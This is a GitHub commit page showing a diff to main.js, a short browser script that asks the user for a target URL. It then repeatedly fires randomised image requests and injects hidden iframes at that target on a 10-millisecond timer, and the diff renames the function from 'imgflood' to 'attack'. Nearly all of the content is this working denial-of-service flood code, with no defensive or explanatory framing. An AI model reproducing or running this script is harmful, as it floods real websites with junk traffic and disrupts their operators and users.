We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent a590217 commit 2dab331Copy full SHA for 2dab331
main.js
@@ -1,11 +1,9 @@
1
- var target = prompt("target");
2
- var uri = prompt("uri");
3
-
4
-function imgflood() {
5
- var TARGET = target;
6
- var URI = uri;
+ var target = prompt("Url");
+function attack() {
7
var pic = new Image();
8
var rand = Math.floor(Math.random() * 1000);
9
- pic.src = 'http://'+TARGET+URI+rand+'=val';
+ pic.src = 'http://'+target+rand+'=val';
+
+ document.body.innerHTML+='<iframe src="'+target+rand+'" style="display:none;"></iframe>';
10
}
11
-setInterval(imgflood, 1);
+setInterval(attack, 10);
0 commit comments